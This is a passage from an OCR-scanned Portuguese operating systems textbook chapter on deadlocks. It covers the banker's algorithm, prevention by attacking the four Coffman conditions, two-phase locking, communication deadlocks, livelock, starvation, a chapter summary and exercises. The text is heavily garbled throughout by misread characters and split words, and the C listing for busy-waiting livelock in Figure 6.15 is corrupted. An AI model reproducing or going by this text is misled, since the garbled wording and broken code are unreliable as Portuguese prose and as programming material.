do aiual e seguro. Suponha que o processo B agora requisite 
uma impressora. Essa requisięao pode ser atendida porque 
o estado resultante ainda e seguro (o processo D pode ter¬ 
minal- e, depois, os processos A ou E , seguidos dos demais). 

Imagine entao que, após alocar para B uma das duas 
impressoras restarttes, E queira a ultima impressora. O aten- 
dimenio dessa reąuisięao reduziria o vetor de recursos dis- 
ponweis a (1 0 0 0), o que levaria a um impasse. Fica muito 
claro que a reąuisięao de E deve ser negada por enąuanto. 

O algoritmo do hanqudro foi publicado pcla primeira 
vcz por Dijkstra cm 1965, Desde essa epoca, quase todos 
os livros de sistemas operadonals o tern descrito em dęta- 
!hes. Iniimeros ariigos foram baseados em varios de seus 
aspectos. Infelizmente, poucos autores tiveram a audada 
de mostrar que, embora em teoria o algoritmo seja ma¬ 
ra vil boso, na praiica e essenciaimente inutil, porque os 
processos raramente sabem com antedpaęao o maximo 
de recursos dc quc vao precisar. Alem dlsso, o niimero de 
processos nao c fixo, mas varia dinamicamente a medida 
que novos usuarios entram c sacm. E, tambem, recursos que 
aparentemente estavam disponivds poderao desaparecer 
repentinamente (unidades de fila podem quebrar). Assim, 
na pratica, poucos sao os sistemas (talvez nenhum) que 
usam o algoritmo do banqueiro para evitar impasses. 


6.6 


Preyenęao de impasses 


Vi$to que evitar impasses e prali ca menie impossfvel — 
pois requer informaęoes acerca das reąuisięoes futuras, o 
que geralmente nao se sabe —, como se pode entao, em 
um sistema real P evitar impasses? A resposta e voltar |)ara 
as quatro condięóes estabeleddas por Coffman et al (1971) 
para verse elas podem dar alguma pista, Se pudermos ga¬ 
ra mir que peio menos inna dessas condięoes nunca seja sa- 
tisfeita, entao impasses serao est rut malmem? impossfveis 
(Havcndcr, 1968). 


_ 6.6.11 Atacando a condicao de exdusao 

mutua 

Primdro, vamos atacar a condięao de ex cl u sao mutua. 
Se nunca a eon tece r de um recurso ser alocado exclusb 
vamente a um unico processo, nunca teremos impasses. 
Contudo, e igualmente óbvio que a permissao para dois 
processos imprimlreni simultaneameme em uma mes- 
ma impressora levaria ao caos. No entanto, utilizando a 
tccnica de spooling, varios processos poderao gerar suas 
safdas ao mesmo tempo. Ncssc modclo, o unico processo 
quc realnienie rcquisita a impressora lisica c o daemon de 
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impressao. Como o daemon nunca reąuiska qualquer outro 
recurso, nao teremos impasses envolvendo a impressora. 

Se o da cm on tivesse sido programado para comcęar a 
impressao mesmo antes de loda a safda lei sido colocada no 
spool a impressora pod cna ficar ociosa se algum processo de 
safda deddisse esperar ho ras após enviar os primeiros dados 
de saida. Por isso, daemons em geral sao próg rama dos para só 
imprimir após lodo o arquivo de safda estar disponfrel. En- 
tretanto, essa decisao pode, por si própria, gerar impasses. O 
qne ocorreria se dois processos ainda nao tivessem completa- 
do suas saidas, mnito embora cada urn ddes houvesse preen- 
cbido meta dc do espaęo disponfvel de spooi com suas saidas? 
Ncsse caso, podcrcmos ter dois processos quc finalizaram 
pardal, mas nao complctamente, suas saidas no spooi e nao 
poderao prosseguir por fali a dc espaęo dc spooi dispomyd 
em disco, Nenhum dos processos pod era lerminar, de modo 
que esiamos dianie de unia siiuaęao de impasse em disco. 

Apesar disso, ncsse caso cxisie um principio dc urna 
idcia quc muitas vczes c usada: cvitar aiocar um rccurso 
quando dc nao for absoiu ta menie ncccssario c tentar asse- 
gurar qne o menor nu mero possfvcl de processos possa, dc 
falo, rcquisitaro recurso. 

_&6.2J Atacando a condicao de passe e 

espera 

A segunda das condięoes estabdeekłas por Coffman 
ei al. parece ser um pouco mais promissora. Se pudermos 
impedir que processos que ja mantem a posse de rccursos 
esperem por mais rccursos, sercmos capazes dc dimlnar 
os impasses. Um nido de alinyir esse objetivo e exigir que 
todos os processos reąuiskem lodos os sens reairsos antes 
de iniciałizarem suas respectivas execuędes, Se tudo estiver 
disponfrel, o processo tera alocado para si o que precisar 
e pod era, entao, ser execuiado ate o firn. Se um ou mais 
dos recursos reąuisitados ja estiverem alocados, nada sera 
alocado e o processo simplesmente tera de esperar antes de 
inidalizar sua execuqao. 

Um próbie ma imediato dessa pralica e que muilos pro¬ 
cessos só sabem de ąuantos reairsos vao precisar após co- 
meęar a ser ex ecu la dos. Na yerdade, se soubessem antes, o 
algoriiino do banqueiro poderia ser usado, Outro problema 
com essa abordagem e que os reairsos nao sera o usados de 
maneira otimizada. Por exeinplo, considere um processo 
que le dados de urna fita de entrada, analisa-os durante 
uma hora e depois os escreve cm urna fita de safda, alem 
dc imprimir os resuitados cm um ploticr. Se todos os rccur¬ 
sos tivcssem dc ser antccipadamenfc solidtados, o processo 
mantena bioąueados a unidadc dc fita de safda e o ploticr 
durante urna hora. 

Apesar disso, alguns sistemas em lote, em computado- 
res dc grandę porte, exigetn que o usuario relacione todos 
os recursos na primeira lin ha ile cada job. O sistema entao 
adquire imedjalamcnte todos os recursos, mantendo-os 
ate o processo estar finalizado. Esse metodo sobrecarrega o 


programador e desperdięa recursos, mas realmenie previne 
impasses. 

Uma maneira um pouco diferente dc interromper a 
condięao dc posse c espera e exigh que um processo que 
esieja requisitando um recurso primeiro libere lemporaria- 
mente todos os omros sob sua posse. Depois disso, ele len¬ 
ta, de uma só vez, obter lodos os recursos de que precisa. 

_ 6.6.51 Atacando a condicao de nao 

preempęao 

Atacar a terceira eon di ęa o (nao preempęao) lambern 
e uma possibilidade. Sc um processo tivcr a posse dc uma 
impressora e esiiver no meio da impressao de seus resul- 
tados, o ato de retomar a foręa a impressora porque um 
ploticr de que esse processo lambem nccessila nao esia 
disponfrel, e complicado na melhor das hipóteses e impos- 
sfrel na piór delas, Entrctamo, alguns recursos podcm ser 
virtualizados de forma a evitar essa skuaęao* Armazenar a 
safda da impressora cm um spooi de disco di mi na impasses 
envo!vendo esse dispositivo, embora crie outro relanunado 
a espaęo em disco. Com discos grandes, entretanto, e im- 
provavel que o espaęo acabe. 

Nem todos os recursos podem ser virtualizados, Por 
exemplo, os registros nos bancos de dados ou tabelas i nici- 
nas do sislema operaeional devem ser travados para uso, o 
que configura uma situaęao bastante favoravel a ocorren- 
cia de impasses, 

_ 6.6.41 Atacando a condicao de espera 

circular 

Resta-nos agora s omen te uma condięao. A espera cii- 
cułar pode ser elimmada de varias maneiras. Um meio sim- 
pies de elimina-la e ler uma regra que detennine que um 
processo tenha permissao para possuir somente um recur¬ 
so de cada vez. Se ele necessitar de um segundo recurso, 
devera liberar o primeiro. Para um processo que necessita 
copiar um arquivo grandę dc uma fita para uma impresso¬ 
ra, essa rcstrięao e inaceitavd. 

Ouira maneira de evitar a condięao de espera circular e 
fornecer uma tui mera ęao global de todos os recursos, como 
mostra a Figura 6.13(a). Agora a regra e esta: processos po- 
dem reqttisilar recursos sempre que necessario, mas todas 
as soliciiaęoes devem ser feitas em ordem numerica. Um 
processo pode requisitar primeiro uma impressora e depois 
uma unidade dc lita, mas de nao pode requisitar primeiro 
um ploticr c depois inno impressora. 

Com essa regra, o gra Ib de alocaęao de recursos nun¬ 
ca conicra ciclos. Na Figura 6J 3(b), vamos ver por que 
isso e verdade para o caso de dois processos, Só pode haver 
impasse sc A reąuisftar o recurso; c B reąuisftar o recurso 
/. Presumindo que / c; sejam recursos distintos, des tern 
diferentes niimcros. Sc i > j r entao A nao tern permissao 
de reąuisitar / porąue estc tem orderu menor do quc a or- 
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1. Impressora 

2. Scanner 

3. Plotter 

4. Unidade de Hta 

5. Unidade de CD-ROM 


© 


(a) 


(b> 


|^| Outras guestoes _ 

Nesta seęaa discutiremos algumas ąuestoes relacio- 
nadas a impasses, como bloąueio em duas fases (two-pkase 
bcking), impasses que nao cnvolvem recursos e condięao 
dc i na n ięa o (starvat 'wn ), 


Figura 6,13 (a) Recursos ordenados numericamente, {5} Um 
I grafice de recursos, 

dem do recurso ja obiido por A. Se i < /, entao 8 nao tern 
permissao de reąuisitar i porąue esie tern ordern metior do 
qtic a ordcm do recurso ja obtido por B. Em qitalquer caso, 
e impossfvel ocorrcr impasse. 

Com mais de dois processos, a mesma regra pode ser 
usada. A cada instante, um dos recursos alocados sera o 
dc ordern mais alta. O processo quc cstivcr dc posse desse 
recurso nuiica solicitara quak]uer outro recurso ja alocado. 
Ele finallzara o u, na piór das hipóteses, reąuisitara ale mes- 
mo recursos de ordens superiores, todos eles dispomveis. 
Por firn, cle terminara c libera ra scus recursos. Nesse poru 
to, algum ouiro processo tomara posse do recurso de mais 
alt a ordcm e lam hem podera fmalizan Em resumo, exisu? 
um cenario cm quc todos os processos finalizarao, de modo 
que nao ocorrera impasse. 

Unia peąuena variaęao desse algoriimo e flexibilizara 
obrigaloricdade de que os recursossejam adąuiridos cm or¬ 
dcm estriiamenie crcsccnlc ca itisisienda de que nenhum 
processo possa reąuisitar um recurso de ordcm inferior 
aqude que ja cstivcr ulilizando* Sc, dc i rudo, um processo 
reąuislta os recursos 9 c 10 e entao libera ambos, na verda- 
dc cle esta iniciaJizando de novo, dc modo que nao existc 
nenhuma razao para proibi-lo tic reąuisitar o recurso I. 

Embora a ordenaęao numćrica dos recursos cli minę 
o próbie ma dos impasses, pode ser impossfrd encomrar 
unia ordcm que sallsfaęa a todos. Quando os recursos cn- 
volvem entradas da tabela de processos, cspaęo em disco 
para spooJing, registros bloąueados de banco de dados e 
outros recursos abstratos, o nu mero de recursos possbeis 
e de lor mas de utilizaęao podera ser tao grandę que nenhu- 
ma ordcm conseguira funcionara contento. 

As varias abordagens para prevenęao dc impasses sao 
resumidas na Tabela 6.1. 


Condięio 

Abordagem contra impasses 

ExclusSo mutua 

Usar spoo! em tudo 

Posse e espera 

Repuisitar inicialmenfe todos os recursos 
necessarios 

Nao preempęao 

Retomar os recursos alocados 

Esperacircular 

Ordenar numericamente os recursos 


i Tabela 6,1 Resume das abordagens para prevenir impasses. 


6-7-1 I Bloqueio em duas fases 

Apesar dc os mcios para cvitar c prevenir impasses nao 
apresentarem uma soluęao gcncrica muito promissora, 
c xist e m, pa ra ap! i ca ęoes esp eeffi cas, c x ce I en t es a Igo ri t mos, 
Porexemplo, cm muitos sistemas de banco de dados, uma 
opera ca o frcąuenLe e a reąuisięao dc bloąueio ( lock) de va- 
rios registros para posterior atuałizaęao. Quando multiplos 
processos eslao sendo simultaneamente executados, cxiste 
um perigo real dc ocorrer impasse. 

Umaabordagem muitas vezestisadaea do bloąueio em 
duas fases (tw^pktiśe iockwg). Na primdra fasę, o processo 
tema bloquear todos os registros dc que precisa, um de cada 
vez. Se for bem-sucedido, ele comeęara a segunda fasę, exe- 
cmando su as atualizaęoes e libera ndo os registros bloąuea- 
dos. Nenhum trabalho real e feito durante a primcira fasę. 

Se, dumnie a primcira fasę, algum registru dc que dc 
predsar ja estiver bloqueadó, o processo simpJesmcntc libe¬ 
ra ra todos os registros por deja bloąueados e rei nicią] izara 
noyamemc a primcira fasę. Dc certa maneira, essa aborda- 
gem e similaraąuela em que se requisitam antecipadamen¬ 
ie todos os recursos necessarios, ou pelo menos ant es que 
algo irreversfvd possa ser feito. Em algo mas versoes do al- 
goritmo do bloąueio em duas fases nao existem a liberała o e 
a reinidalizaęao caso um bloąueio seja encontrado durante 
a primcira fasę. Nessas versdes, po dera o ocorrcr impasses. 

Com udo, essa esirategia nao e a mpiamente aplicaveL 
Por exemplo, em sistemas de tempo real e sistemas de con- 
trole de processos, simplesmente nao e aceitavel terminar 
parciał me n te um processo, porą u e um recurso nao estava 
disponfvel r e reinidar tudo mwamente. Tambem nao e acei- 
tavel reinidar se o processo tiver lido ou cscrito men sagę ns 
na redc, atnalizado arquivos ou feito ąualąucr outra coi- 
sa ąuc nao possa ser repetida com seguranęa. O algoritmo 
funcionara apenas nas situaęoes em que o programador li- 
ver organizado tudo muito cuidadosamente, de modo que 
o programa possa ser parado em ąualąucr porno durante a 
primcira fasę e depois reiniciado, Muitas aplicaęoes naosao 
passfveis de ser estnnuradas dessa maneira. 

6.7.2 I Impasses de comunieacao 

Ale agora, todo o nosso traballio concentrou-se em 
impasses que envolviam recursos. Um processo quer algo 
que outro processo tern c devc esperar ate que o primeiro o 
liberc, As vezes os recursos sao objetos de hardware ou de 
software, como unidades de CD-ROM ou registros de ban- 
cos de dados, mas algumas vezes des tambem podem ser 
mais abstratos. Na Figura 6.2, vimos um impasse no qual 
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os recursos eram mutexes. Essa situaęao e urn po u co mais 
abstrata do que a de u ma unidade de CD-ROM, mas, no 
exemplo, ca da processo conseguiu com sucesso o recurso 
do qual precisava (uni dos mi]tcxcs) e entrou cin impasse 
tcntando obter o recurso do outro (o outro mutex). Esta e 
u ma situaęao dassica de impasse de recurso. 

Como menrionamos no infcio do capitulo, entretan- 
lo, embora os impasses dc recurso scjam os niais comuns, 
des nao sao os unicos. Outro lipo de impasse pode ocorrer 
cm sislemas de comimicaęao (redes de co mp ul a dar es, por 
exemplo), nos quais dois ou mais processos se eomunicam 
por meio do envio dc mensagem. Urna situ aęa o comum 
c aquda na qual o processo A envia u ma mensagem de 
solicitaęao ao processo B e bloqueia ate que B envie lima 
resposta. Imagine quc a rcsposta sc pcrca e A sc manlenłia 
parado esperando que da chegue. O processo £, por sua 
vez, łka bloąueado esperando por urna solicitaęao que lhc 
diga o quc fazcr. Tcmos aqui um impasse. 

Nao e, com u do, o impasse dassico. O processo A nao 
esta com um recurso do qual B necessita, e vice-versa. Na 
verdade, nao hi scąuer sinal de recursos. Ć um impasse, 
entretanto, segundo nossa dcfinięao formal visto quc le¬ 
ni os um conjunto de (dois) processos, ambos bloqueados 
esperando por um evento que somente seu par pode cau- 
sar. Essa situaęao e chamada de impasse de comunicaęao 
para contrastar com o impasse mais comum (o dc recurso). 

Os impasses dc comunicaęao nao podem ser evitados 
pela ordenaęao de recursos (ja qtie eles nao existem) ou 
pelo escalonnmento cuidadoso (ja quc nao ha situaęoes nas 
quais urna solicitaęao prcdsc seradiada). Felizrncntc, exis- 
te mitra tecnica que ge rai men te pode ser uiilizada para re- 
solvcros impasses dc comunicaęao: ocontrole dc um limitu 
dc tempo (timeout). Na maior parte dos sistemas dc comu- 
nicaęao em rede, sempre que utną mensagem e emiada e 
predsa esperar por urna rcsposta, c inkializado um tempo- 
rizador. Se o limite dc tempo estourar antes de a rcsposta 
chegar, o processo que enviou a mensagem presume que 
da se perdeu e a envia novamente (e quantas vezes forem 
necessarias), AssLm, c pośśfvd prevenir o impasse, 

E claro que, se a mensagem inidal nao se perdeu e a 
resposta esta simpiesmente atrasada, o remeiente pode re- 
ceber a mensagem duas vczes ou mais, o que pode causar 
consequendas desagradaveis. Pcnse cm um sistema detró- 
nico de um banco no qual a mensagem contem instruęóes 
para realizar um pagamerlo. E óbvio que a mensagem 
nao pode ser duplicada (e executada) mais do que unia 
vez simpiesmente porque a rede esta lenta ou porque o 
limite de tempo de rcsposta e muito curto. O projeto das 
regras de comunicaęao para que tudo de certo, denomina- 
do protocolo, e um assunto complexo c nao sera eonie m- 
plado neste livro. Os leitores imeressados nos protocolos dc 
rede podem recorrer a outra publicaęao do niesrno autor: 
Redes de Computador es (Tanenbaum, 2003). 


Nem todos os impasses que ocorrem em sistemas de 
comunicaęao ou redes dc eomputadores sao impasses 
dc comunicaęao. Os impasses de recurso tambćm podem 
ocorrer nesses sistemas. Considere, por cxemplo, a rede 
apresentada na Figura 6,14 r que c urna visao simplifica- 
da da Internet. Basta nie simplificada. A Internet consiste 
de dois tipos de compuiadores: hospedeiros e roteadores. 
Um hospedeiro (host) ć um computador de um usuaiio 
— um PC domestico ou em urna empresa ou um servidor 
corporativo — o qual faz os trabalhos para as pessoas. Um 
roteador {router) c um computador espccializado em co- 
municaęoes que movimenta os pacotes de dados da origem 
para o destino, Cada hospedeiro esta conectado a um ou 
mais roteadores por linha DSL, IV a cabo, LAN, conexao 
dm!-up, rede sem flo, fibra ótica ou quaiquer outro meio. 

Quando um pacote chega ao roteador oriundo de al- 
gum hospedeiro, cle e alocado em um buffer para futura 
transmissao a outro roteador, e depois para outro, ate que 
chegue a seu destino. Esses buffers sao recursos e existem 
em unia quantidade limitada. Na Figura 6J4 r cada rotea¬ 
dor possui somente oito buffers (na pralka, cles possucm 
milhocs, mas isso nao exclui a possibilklade de impasse, 
somente diminui sua frequenda), Suponha quc todos os 
pacotes no roteador A precisem chegar a J3, todos os pacotes 
cm B precisem chegar a C, todos os pacotes em C preci¬ 
sem chegar a Dc todos os pacotes em D precisem chegar a 
A. Nenhum pacoLe pode se movimemar porque nao exis- 
tc buffer livrc cm seu destino c temos, assim, um dassico 
impasse de recurso, apesar de esiarmos cm um sistema de 
eomimicaęao. 

6.7.3 | Livelock 

Em a Ig u mas situaędes, o recurso de poi ling (espera 
ocupada) e ulihzado para que seja posswcl entrar cm u ma 
regiao cniica ou acessar um recurso. Bsa estrategia geral- 
mente e empregada ąuando a exclusao muiua sera uiiliza¬ 
da por um perfodo muito curto e a sobrecarga da suspensao 
e grando se comparada a execuęao do traballio. Considere 
uma primitiva atomica na qual o processo chamador icsta 
um mutex c aproprta-se dele ou retorna a la Ilia. Para nm 
exemplo, vcja a Figura 2.21. 



I Figura 6.14 Um impasse de recurso em urna rede. 
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Agora imagine Lim par de processos utilizando dois 
recursos, conforme mostrado na Figura 6.15. Cada um 
precisa de dois recursos e ambos fazem uso da primitWa 
de połlimj enterjre$ion para rentar obter os acessos neces- 
sarios. Sc a teniativa falba, o proccsso simplesmcntc tema 
novameiite. Na Figura 6.15, sc o proccsso A for executado 
primciro c obtiver o recurso 1 c, cm seguida, o proccsso B 
for execiitado c obtiver o recurso 2, indiferentemente do 
proximo proccsso a ser executado, nao havera progeesso, 
mas nenbum proccsso flcara bloąueado. O proccsso faz uso 
infiniio de sua parcela da CPU, mas nao fka bloąueado. As- 
sim sendo, nao temos um impasse (pois nenii um processa- 
mento e bloqueado), mas temos urna situaęao equivaleme 
denominada Iivelock. 

0 livdock pode aconleccr das maneiras mais inespera- 
das possfveis. Em alguns sistemas, o mi mero lotal de pro¬ 
cessos permitidos e determinado peio numero de emradas 
na tabela de processos. Assim sendo, as emradas na tabela 
de processos sao recursos finitos. Se urna instruęao fork fa- 
lhar porque a tabela esta cheia, unia salda razoavel para 
o programa execi.it and o o fork e esperar um determinado 
tempo e temar novamente. 

Agora imagine ąue um sistema UNIK possui 100 emra¬ 
das na tabela de processos. Dez programas estao on execu- 
ęao e cada um deles precisa eriar 12 (sub)processos. Depois 
que cada processo criou outros 9, os 10 primeiros processos 
mais os outros 90 criados estouraram a capacidade da ta¬ 
bela. Cada um dos 10 processos iniciais encontra se agora 
em um laęo infiniio tentando execiHar fork e falhando: um 
impasse, A probabilidadc dc isso acontcccr c mmi ma. mas 
cxistc. Dcvcmos abandonar os processos c a chamada fork 
para eiiminar o problcma? 

Analogamente, o numero maximo de arqtiivos abertos 
e definido pela tabela de i-nodes e, portanto, temos um pro¬ 
blcma semelliante quando essa tabela esta cheia* O espaęo 
em disco para swap e outro recurso limitado* Na yerdade, 
ąuase todas as ta be las do sistema operadonal represemam 
um recurso limitado, Sera que devenamos deixar de usa-la 

void process_A{void) { 

enter_reg jon(&resource _ 1); 
enter regionf&resource 2); 
use_botb_resources(); 
leave_ regian(&resource „2); 
leave..region{&resource 1); 

> 

void process_B{void) { 

enter_region(&resource_2); 
enter_ reg ionf&resource _ 1); 
use_both_resource$(); 
leave_ region (&resource _ 1); 
leave,_. region (&reso u rce „2); 

> 

I Fi g u ra 6 .1 5 A espera ocupada que poda acarretar um liveloęk . 


por conta da possibilidade de n processos solicitarem 1 In do 
Lotal e, em seguida, cada um deles lentarsolicitar mais um? 
Esta provavelmente nao e unia boa ideia. 

A maioria dos sistemas opera ci on ais, [ndiisive o UN1X 
e o Windows, simplesmeme ignora o problema e presume 
que a inaior parte dos usuarios preferiria um livelock oca- 
sional (on mesmo um impasse) a urna regra restringindo 
cada usiiario a um processo, um arquivo aberio e a um 
de todos os outros recursos. Se esses problemas pudessem 
ser eliminados sem ais to, nao haveria tania discussao. A 
ąuestao c quc o preęo c alto c, cm grandę parte, rcsume-sc 
a imposięao dc restrięoes inconvcnicntcs aos processos. As¬ 
sim sendo, estamos dianie dc urna tracą insatisfatoria entre 
coiwcnienda c corrcęao, e a maior parte da discussao gira 
em terno de qual das duas e mais importante e para quem. 

Valc a pena mcncionarquc a Ig u mas pessoas nao fazem 
distinęao entre a condięao dc inanięao c o impasse porqut\ 
em ambos os casos, nao ha como segnlr adiante. Outras 
dizem que eles sao funda mentalnie nte diferentes porąue 
e posswel programar um processo para temar fazer algo n 
vezes e r se todas fa Ilia rem, temar algo diferente. Um pro¬ 
cesso bloqueado nao tern essa escolha. 

6.7.4 I Condięao de inanięao 

Um problcma intimamente relacionado a qucstao dos 
impasses e o da condięao cle inanięao (mwathn), Em 
um sistema di na mi co, regnistęoes por recursos ocorrem o 
tempo todo* £ necessario algum tipo de polftioa que tome 
urna decisao sobre quem consegue qual recurso e ąuanda 
Essa polftica, embora seja aparememente razoaveI, pode 
fazer com que alguns processos nunca obtenhani o servięo, 
muito embora nao estejam em situaęao de impasse. 

Por cxcmplo, considere a alocaęao da impressora. Ima¬ 
gine que o sistema use algum lipo de algoritmo para garan- 
tir que a alocaęao da impressora nao leve a oćorreiicia de 
um impasse. Agora su po n ha que varios processos ąueiram 
usa-la simultaneameme. Qual deles deveria obte-la? 

Um possfvel algoritmo de alocaęao consiste em ceder 
a impressora ao processo com o metior arquivo a ser im- 
presso (presumindo que essa mformaęao esieja dispom- 
vd). Essa estrategia niaximiza o numero de clientes fciizcs 
e parece justa. Agora considere o quc ocorre cm um siste¬ 
ma cheio de processos quando um deles tem um arquivo 
i menso para imprimir, Cada vez que a impressora cstiver 
livre, o sistema vai procurar e cscolhcr um processo com o 
menor arquivo. Sc existir um fluxo constantc dc processos 
com arquivos peąuenos, o processo com o arquivo grandę 
nunca pod era alocar a impressora. Ele sera pręt codo inde- 
finidamente, ainda que nao esteja bloqueado, levando o 
proccsso a uma condięao dc inanięao. 

A condięao de inanięao pode ser evitada com a polftica 
de alocaęao primeiroa dmjar ( primeiro a ser senńdo. Com essa 
pratica, o processo que estiver esperando por mais tempo 
torna-se o próximo a reccber o recurso. No dcvido nionicn- 
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to, qualquer processo acabara por se tomar o mais veIho e, 
assim, obtera o recurso necessario. 



Pesguisas em impasses 


Se existe um assunto que foi incansavdmente iiwes- 
tigado no infcio da cxistćnria do sistema operadonal foi 
o impasse. A razao para isso e que a detecęao de impas¬ 
ses e um peąueno e interessame próbie ma da teoria dos 
grafos com o qual quatquer estudanie de graduaęao com 
certa indinaęao para a matemalica pode Udar duranie ires 
ou ąuatro anos. To dos os tipos de algoritmos fortun pro- 
postos, cada um mais exótico e menos pratico do quc o 
outro. Muito dessc trabalho ja caiu no esquedmento r mas 
ainda ha publicaęoes sobrc diverso$ aspectos dos impasses. 
As pesquisas induem detecęao em tempo real de impasses 
causados pdo uso mcorreto de inslmęoes lock e scmaforos 
(Agarwal e Stoller, 2006; Bensalem et al, 2006), prevem 
ęao de impasses em threads Java (Permandia et al. # 2007; 
Williams et al., 2005), tratamcnto de impasses em redes de 
computndores (Jayasimha, 2003; Karol ct al., 2003; Scha- 
fcr et al., 2005), modelagem de impasses em sistemas de 
fluxos de da dos (Zliou c Lee, 2006) e detecęao de impasses 
dinamicos (Li et al., 2005). Levine (200 3a, 2003b) compa- 
rou definięoes diferentes (e contraditórias) de impasse na 
literatura e sugeriu um esquema classificatório para eles. 
Hla tambem observou a difcrenęa eture prever e evitar 
impasses (Lcvinc # 2005), A rccupcraęao após o impasse 
tambem tern sido estudada (David et al., 2007). 

Entretanto, ainda ha alguma pesquisa (teórica) sobie 
a deteeęao de impasses distriluudos. Nao trataremos disso 
aqui porąue (i) esta fora do escopo deste livro e (2) nao e 
nem um pouco pratico cm sistemas rcais. Alem disso, su a 
funęao principal parece ser a de manier o emprego de pes- 
quisadores em teoria dos grafos. 



Resumo 


Impasse e um problema potencial em qualquer siste- 
ma operadonal. Ele ocorre quando imegrantes de um gru¬ 
po de processos sao bloqueados em funęao da espera por 
um evemo que somente outros processos do grupo podem 
ca u san Essa suuaęao faz com que todos os processos espe- 
rcm para semprc\ Em geral o evemo pdo qual os proces¬ 
sos estao esperando e a libcraęao de algum recurso em uso 
por outro processo do grupo. Tambem e posswel que um 
impasse ocorra quando todos os processos de urn conjun¬ 
io de processos de conmmcaęao estao esperando por unia 
mensagera o canal de comuriicaęao esta vazio e nao ha 
timeouts pen de mes. 

Impasses de recurso podem ser evitados por mero do 
controlc de quais esta dos sao seguros c quats sao inseguros. 
Um estado seguro ć aqudc cm quc existc uma scqucncia 
de cvcntos que garanta quc todos os processos possani ser 


condufdos. Um estado inseguro nao apresenta essa garan¬ 
iła. O algoritmo do banqueiro evita impasses ao nao aten- 
der a uma requisięao quando da puder colocar o sistema 
em um estado inseguro. 

Impasses de recurso podem ser prevenidos estru tu¬ 
ra Imente se o sistema for projetado de modo que nunca 
possani vir a oeorrer. Por exempIo, ao conceder a posse 
de somerue um recurso por processo de cada vez, quebra- 
-se a eon di ęa o de espera circular ncccssaria a ocorrćncia dc 
impasses. Impasses de recurso tambem podem ser evitados 
numerando-se todos os recursos e obrigando os processos a 
requisita-1os em ordem estritamente cresceme. 

Impasses de recurso nao sao os u ni cos. Impasses de co- 
numicaęao tambem representam um problema potencial 
em alguns sistemas. embora semprc possani ser tratados 
por mdo da definięao de timeouts apropriados. 

Livdock e semelhante ao impasse no que diz respeito 
a impossibilidade de continuaęao do proeessamento, mas e 
ic cni ca ni en te difereme porque envolve processos que ain¬ 
da nao estao bloqueados. A condięao de inanięao {stawa- 
tion) c passwcl dc ser evitada sc for adotada uma politica dc 
alocaęao primeiro a chegan primeiro a ser serndo. 


Problemas 

1. De um exemplo de impasse provenieme da politica. 

2. Estudantes trabalhando cm seus PCs em um laboratório 
dc computaęao enviaiu seus arquivos para serem impres- 
sos por um scrvidor que usa a tccnica de spooling para 
tnante-los cm scu disco rfgido. Em quais condięocs pode 
oeorrer impasse se o espaęo cm disco para o spool de im- 
pressao for limitado? Como evltar impasses nesse caso? 

3- Na Figura 6.1, os recursos saodevolvidos na ordem invcr- 
sa de suas aquisięoes. Dcvolvc-los cm outra ordcm seria 
igualmente bom? 

4. Quatro condiędes sao necessarias para que baja um im¬ 
passe de recurso (cxdusao mtitua, posse e espera, nao 
preernpęao, espera circular). De um exemplo que de- 
monstre que essas condiędes nao sao su Ficie mes para que 
ocorra um impasse de recurso. Quando elas sera o sufi - 
ciemes para causar um impasse desse tipo? 

5. A Figura 6.3 inostra o conceito de um grafo de recursos. 
Podem cxistir grafos ilcgais, Ssto e, grafos que cstrutural- 
mente violam o modelo em que nos temos baseado para 
o uso de recursos? Em caso afirmativo, de um exemplo, 

6. Imagine quc exista um impasse de recurso em um slste- 
ma. De um exemplo que mostre que o conjunto de pro¬ 
cessos bioqueados pode induir processos que nao estao 
na cadcia circular no grafo dc alocaęao dc recursos cor- 
respondente. 

Z A discussao do algoritmo do avestruz menciona a possibi- 
lidade de ocupaęao toial das entradasda tabela de proces¬ 
sos ou de out ras labelas do sistema. Sugira uma maneira 
dc pennitir que um administrador do sistema recupere 
essa situaęao, 
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8. Explique como o sistema pode sc nccupcrar do impasse 
descrito no problema anterior utilizando (a) Recuperaęao 
por meio de preempęao; (b) Recuperaęao por meio de re- 
versao de estado e (c) Recuperaęao por meio da elimma- 
ęao de processos. 

9. Suponha que, na Figura 6,6, C,, + R i; > £.para um i qual- 
qucr, Quc implicaęoes cssa suposięao Lem para o sistema? 

10 * Qual e a prindpal diferenęa enire o modelo mostrado na 
Figura ń.B e os estado s seguro c inseguro descritos na Se- 
ęao 6.5,2? Qual a conseąuencia dcssa diferenęa? 

11. O esąucma da trajctória dc recursos da Figura ć.S tambćm 
pode ser ttsado para ilustrar o problema dos impasses com 
tres processos e tres recursos? Hm caso afirmativo, como 
tsso pode ser feiio? Caso eontrario, por que nao? 

12. Teoricameme, os gra fos dc trajctórtes dos recursos podc- 
riam ser usados para evitar impasses. Usando um escalo- 
namento imcligemc, o sistema operacional poderia evitar 
rcgióes inseguras. Sugira um problema pratico quc real- 
mentc faęa isso. 

13. Um sistema pode atingir um estado que nao esteja cm sb 
tunęao dc im passe e quc nao seja seguro? Em caso a firm a ~ 
tivo, de um exemplo, Caso eontrario, demonstre se todos 
os estados sao seguros ou se estao em situaęao de impasse. 

14. Considere um sistema que utiliza o algoriuno do ban- 
ąuetro para eviiar impasses. Em determinado momento, 
o processo P solk i ta o recurso R. que, entbora esteja dis- 
pomvel, nao e liberado. Isso signilica que, se o sistema H- 
berasseo recurso If para P t o sistema sofreria um impasse? 

15. Urna limitaęaO‘Chave do algoritmo do banąueiro e que 
ele reąuer o conhecimento da necessidade maxima de re¬ 
cursos de todos os processos. fi possivci projetar um algo- 
ritmo para prevenęao dc impasses quc nao precisc dc tal 
informaęao? £xplique. 

16. Observe cuidadosameme a Figura 6.11(b>, O fato de D 
solieitar mais utną unidade leva a um estado seguro ou 
mseguro? E se a solieilaęao vier de C em vez de D? 

17. Um sistema tem dois processos e tres recursos identteos. 
Cada proccsso prccisa dc, no maximo, dois recursos, £ 
possivcl ocorrcr impasse? iustifiąue sua resposta. 

18 * Considere no va menie o probienia anterior, mas agora 
com p processos, cada um necessitando de um ma x im o 
de m recursos dc um lotal dc r recursos disponweis. Qual 
a condsęao para quc o sistema fique livre de impasses? 

19* Suponha que o processo A na Figura 6.12 requisite a ulti¬ 
ma unidade dc fita. Essa aęao causara impasse? 

20. Um computador tern seis unidades de fita, coeii n proces- 
sos competindo por elas. Cada processo pode precisar de 
duas unidades. Para ąuais valores de n o sistema estara 
1 ivre dc impasses? 

21 . O algoritmo do banąueiro es ta sen do executado em um 
sistema com m dassesde recursos e n processos. No linrite 
com m e n grand es, o nu mero dc opcraędes que devem 
